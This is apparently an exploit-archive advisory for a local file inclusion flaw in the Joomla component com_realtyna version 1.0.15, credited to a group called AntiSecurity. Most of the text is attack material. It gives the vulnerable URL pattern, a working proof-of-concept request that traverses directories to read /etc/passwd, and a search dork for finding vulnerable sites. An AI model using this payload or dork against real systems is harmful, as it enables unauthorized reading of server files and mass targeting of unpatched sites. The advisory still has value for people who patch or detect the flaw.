Joomla Component Realtyna Translator LFI Vuln

[o] Joomla Component Realtyna Translator Local File Inclusion Vulnerability
Software : com_realtyna version 1.0.15
Vendor : http://software.realtyna.com/
Author : AntiSecurity [ NoGe Vrs-hCk OoN_BoY Paman zxvf s4va ]
Contact : public[at]antisecurity[dot]org
Home : http://antisecurity.org/


[o] Exploit
http://localhost/[path]/index.php?option=com_realtyna&controller=[LFI]


[o] PoC
http://localhost/index.php?option=com_realtyna&controller=../../../../../../../../../../etc/passwd


[o] Dork
inurl:"com_realtyna"